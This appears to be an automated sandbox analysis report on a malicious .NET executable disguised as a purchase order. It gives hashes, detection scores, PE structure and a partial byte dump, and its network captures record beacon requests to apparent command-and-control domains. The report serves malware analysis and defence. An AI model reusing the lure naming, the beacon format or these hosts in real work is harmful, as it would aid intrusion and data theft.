                                                    SHA-512:2124A0CB2135BFC5731554AAA534E6BA9063137450E5DF18A56C8DD661D8D926278C1D658F1AEF44D3522598E047F4735CA5A06CEF41BE3593101A089F3494BA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 43%
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P..*...........I... ...`....@.. ....................................@.................................XI..S....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............<..............@..B.................I......H.......HY..........B....O..X...........................................kh.6.v.h.j...@..'.h.BD..c."~-...^.....r.S...R....!.Z...#i......8..4.2,..5.aw!D...0.Z%....Z.w(....a...y..u...?.[...j....a0.`2.\........d..w..G..}.D....<..`.C.....A....5....s.A....U..Pff..DF.... N.g..e.(........3.).<..;6.F.x%...q.f.=+.Q............./A1CHt....2....G?.+..m...3.G.B...*...i.A..C......R...BE....R..b..1t....Z....z`..P.. ...~XS!R.(.........T.o....D...b..lM.<+0..p..$.fd......H..j
                                                    C:\Users\user\AppData\Roaming\kwqifureL.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\PO_210223.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.2424881132869325
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:PO_210223.exe
                                                    File size:802304
                                                    MD5:e40af9745e938b72d5d860bbc679aebf
                                                    SHA1:d9e750061417b0ca9f933db79c99c12934abbe84
                                                    SHA256:38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
                                                    SHA512:2124a0cb2135bfc5731554aaa534e6ba9063137450e5df18a56c8dd661d8d926278c1d658f1aef44d3522598e047f4735ca5a06cef41be3593101a089f3494ba
                                                    SSDEEP:12288:9ORam/OrNbZTlgJqfsRVeh58JtAZUdt4odT9YdxOI/aFOAhIE+TtORqH4O4H1rVR:QFiJNlFfdkP4odidxTCEd2
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q4`..............P..*...........I... ...`....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4c49ae
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x60345188 [Tue Feb 23 00:51:20 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc49580x53.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000xfe8.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xc29b40xc2a00False0.699083273121data7.247286296IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xc60000xfe80x1000False0.399658203125data5.00156812291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xc80000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0xc60a00x334data
                                                    RT_MANIFEST0xc63d40xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2018
                                                    Assembly Version1.0.0.0
                                                    InternalNameUCOMITypeComp.exe
                                                    FileVersion1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameRegisterVB
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionRegisterVB
                                                    OriginalFilenameUCOMITypeComp.exe

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 23, 2021 08:59:45.696063042 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:45.858366966 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:45.858566999 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:45.858961105 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.021274090 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.287998915 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288073063 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288115978 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288146973 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288218975 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288261890 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288300037 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288306952 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.288347960 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.288388968 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.288444042 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.346735954 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.369762897 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.370002985 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.450568914 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.450594902 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.450609922 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.450627089 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.450850010 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.509321928 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.509608984 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 08:59:46.532135963 CET8049763204.11.56.48192.168.2.4
                                                    Feb 23, 2021 08:59:46.532339096 CET4976380192.168.2.4204.11.56.48
                                                    Feb 23, 2021 09:00:04.907589912 CET4976580192.168.2.4103.66.59.142
                                                    Feb 23, 2021 09:00:05.238830090 CET8049765103.66.59.142192.168.2.4
                                                    Feb 23, 2021 09:00:05.239036083 CET4976580192.168.2.4103.66.59.142
                                                    Feb 23, 2021 09:00:05.239259958 CET4976580192.168.2.4103.66.59.142
                                                    Feb 23, 2021 09:00:05.567799091 CET8049765103.66.59.142192.168.2.4
                                                    Feb 23, 2021 09:00:05.594891071 CET8049765103.66.59.142192.168.2.4
                                                    Feb 23, 2021 09:00:05.594916105 CET8049765103.66.59.142192.168.2.4
                                                    Feb 23, 2021 09:00:05.595118046 CET4976580192.168.2.4103.66.59.142
                                                    Feb 23, 2021 09:00:05.595191956 CET4976580192.168.2.4103.66.59.142
                                                    Feb 23, 2021 09:00:05.925678968 CET8049765103.66.59.142192.168.2.4
                                                    Feb 23, 2021 09:00:25.861310005 CET4976780192.168.2.423.229.197.103
                                                    Feb 23, 2021 09:00:26.050574064 CET804976723.229.197.103192.168.2.4
                                                    Feb 23, 2021 09:00:26.050730944 CET4976780192.168.2.423.229.197.103
                                                    Feb 23, 2021 09:00:26.050930977 CET4976780192.168.2.423.229.197.103
                                                    Feb 23, 2021 09:00:26.240051985 CET804976723.229.197.103192.168.2.4
                                                    Feb 23, 2021 09:00:26.258440971 CET804976723.229.197.103192.168.2.4
                                                    Feb 23, 2021 09:00:26.258481979 CET804976723.229.197.103192.168.2.4
                                                    Feb 23, 2021 09:00:26.258781910 CET4976780192.168.2.423.229.197.103
                                                    Feb 23, 2021 09:00:26.258807898 CET4976780192.168.2.423.229.197.103
                                                    Feb 23, 2021 09:00:26.447956085 CET804976723.229.197.103192.168.2.4

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Feb 23, 2021 08:58:18.862360001 CET5372353192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:18.898766994 CET6464653192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:18.911287069 CET53537238.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:18.947359085 CET53646468.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:19.170614958 CET6529853192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:19.219403028 CET53652988.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:20.837881088 CET5912353192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:20.886643887 CET53591238.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:21.803251982 CET5453153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:21.854785919 CET53545318.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:22.494116068 CET4971453192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:22.552618027 CET53497148.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:22.623030901 CET5802853192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:22.671576977 CET53580288.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:23.635773897 CET5309753192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:23.687556028 CET53530978.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:24.639569044 CET4925753192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:24.688286066 CET53492578.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:48.091200113 CET6238953192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:48.142822027 CET53623898.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:49.042687893 CET4991053192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:49.099924088 CET53499108.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:49.917707920 CET5585453192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:49.969238997 CET53558548.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:51.016117096 CET6454953192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:51.067745924 CET53645498.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:51.809954882 CET6315353192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:51.858937025 CET53631538.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:52.633148909 CET5299153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:52.682436943 CET53529918.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:53.913933992 CET5370053192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:53.965698004 CET53537008.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:54.282479048 CET5172653192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:54.334002972 CET53517268.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:54.747322083 CET5679453192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:54.795957088 CET53567948.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:55.957005024 CET5653453192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:56.026484013 CET53565348.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:57.354686975 CET5662753192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:57.406266928 CET53566278.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:58:59.442359924 CET5662153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:58:59.491060972 CET53566218.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:00.320329905 CET6311653192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:00.377401114 CET53631168.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:09.531554937 CET6407853192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:09.596590042 CET53640788.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:15.546408892 CET6480153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:15.595046043 CET53648018.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:23.286400080 CET6172153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:23.353519917 CET53617218.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:24.241563082 CET5125553192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:24.301482916 CET53512558.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:25.089857101 CET6152253192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:25.173163891 CET53615228.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:25.749360085 CET5233753192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:25.809186935 CET53523378.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:26.346574068 CET5504653192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:26.403739929 CET53550468.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.002182961 CET4961253192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.021836042 CET4928553192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.059883118 CET53496128.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.086724043 CET53492858.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:27.706384897 CET5060153192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:27.763459921 CET53506018.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:28.665956974 CET6087553192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:28.736999035 CET53608758.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:29.677529097 CET5644853192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:29.734661102 CET53564488.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:30.280334949 CET5917253192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:30.337259054 CET53591728.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:35.141000032 CET6242053192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:35.201513052 CET53624208.8.8.8192.168.2.4
                                                    Feb 23, 2021 08:59:45.485291004 CET6057953192.168.2.48.8.8.8
                                                    Feb 23, 2021 08:59:45.687182903 CET53605798.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:03.621087074 CET5018353192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:03.671164989 CET53501838.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:04.547594070 CET6153153192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:04.906436920 CET53615318.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:05.773307085 CET4922853192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:05.838593006 CET53492288.8.8.8192.168.2.4
                                                    Feb 23, 2021 09:00:25.798266888 CET5979453192.168.2.48.8.8.8
                                                    Feb 23, 2021 09:00:25.860059977 CET53597948.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Feb 23, 2021 08:59:45.485291004 CET192.168.2.48.8.8.80x34c5Standard query (0)www.pophazard.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:00:04.547594070 CET192.168.2.48.8.8.80xb733Standard query (0)www.246835.comA (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:00:25.798266888 CET192.168.2.48.8.8.80x8902Standard query (0)www.kaieteurny.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Feb 23, 2021 08:59:45.687182903 CET8.8.8.8192.168.2.40x34c5No error (0)www.pophazard.com204.11.56.48A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:00:04.906436920 CET8.8.8.8192.168.2.40xb733No error (0)www.246835.comsll.nnu.pwCNAME (Canonical name)IN (0x0001)
                                                    Feb 23, 2021 09:00:04.906436920 CET8.8.8.8192.168.2.40xb733No error (0)sll.nnu.pw103.66.59.142A (IP address)IN (0x0001)
                                                    Feb 23, 2021 09:00:25.860059977 CET8.8.8.8192.168.2.40x8902No error (0)www.kaieteurny.comkaieteurny.comCNAME (Canonical name)IN (0x0001)
                                                    Feb 23, 2021 09:00:25.860059977 CET8.8.8.8192.168.2.40x8902No error (0)kaieteurny.com23.229.197.103A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.pophazard.com
                                                    • www.246835.com
                                                    • www.kaieteurny.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.449763204.11.56.4880C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 08:59:45.858961105 CET6811OUTGET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.pophazard.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 08:59:46.287998915 CET6813INHTTP/1.1 200 OK
                                                    Date: Tue, 23 Feb 2021 07:59:45 GMT
                                                    Server: Apache
                                                    Set-Cookie: vsid=918vr3616127860534399; expires=Sun, 22-Feb-2026 07:59:46 GMT; Max-Age=157680000; path=/; domain=www.pophazard.com; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_F6FX+ZNnJXLKTmtoz4Zbn33M3dcgDySmD+TZLM31TPXG44ciXETJu/O4ZJisipBqiF85zsahUw0ArWA/pDFCdw==
                                                    Keep-Alive: timeout=5, max=112
                                                    Connection: Keep-Alive
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    Data Raw: 35 62 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 6f 70 68 61 7a 61 72 64 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d 61 47 34 32 51 58 64 4c 5a 45 70 78 56 44 52 35 59 32 52 71 4e 55 74 42 62 6e 49 76 61 55 4e 4e 61 57 4a 56 64 45 56 51 56 6a 6c 4a 4d 55 78 56 52 32 64 77 57 46 46 45 53 48 64 4b 56 32 56 6c 61 44 46 33 54 6a 68 30 56 6b 74 6e 5a 45 70 4d 64 6b 52 6c 4b 32 35 47 61 30 52 42 4e 48 46 72 4c 31 64 61 61 55 70 49 4d 54 56 5a 4f 55 31 50 53 30 64 6e 4d 45 31 58 57 6c 6c 36 57 6b 56 6b 52 56 55 78 54 32 39 58 62 48 52 56 53 6c 55 39 26 62 3d 22 2b 61 62 70 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 6d 67 6c 6f 67 29 3b 69 66 28 74 79 70 65 6f 66 20 61 62 70 65 72 75
                                                    Data Ascii: 5b93<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.pophazard.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglog.style.width="0px";imglog.src="http://www.pophazard.com/sk-logabpstatus.php?a=aG42QXdLZEpxVDR5Y2RqNUtBbnIvaUNNaWJVdEVQVjlJMUxVR2dwWFFESHdKV2VlaDF3Tjh0VktnZEpMdkRlK25Ga0RBNHFrL1daaUpIMTVZOU1PS0dnME1XWll6WkVkRVUxT29XbHRVSlU9&b="+abp;document.body.appendChild(imglog);if(typeof abperu


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.449765103.66.59.14280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 23, 2021 09:00:05.239259958 CET6841OUTGET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1
                                                    Host: www.246835.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 23, 2021 09:00:05.594891071 CET6841INHTTP/1.1 302 Found
                                                    Cache-Control: private
                                                    Content-Type: text/html; charset=utf-8
                                                    Location: https://www.246835.com/ntg/?ojohzz=w4x+hauhjfrojmp94c1onpoapenzzptxtrzxhswsn9e2urxoamjimifvyc4x6954j+dz&1bm=gpd0lnkpffhtab
                                                    Server: Microsoft-IIS/10.0
                                                    X-AspNet-Version: 4.0.30319
                                                    X-Powered-By: ASP.NET
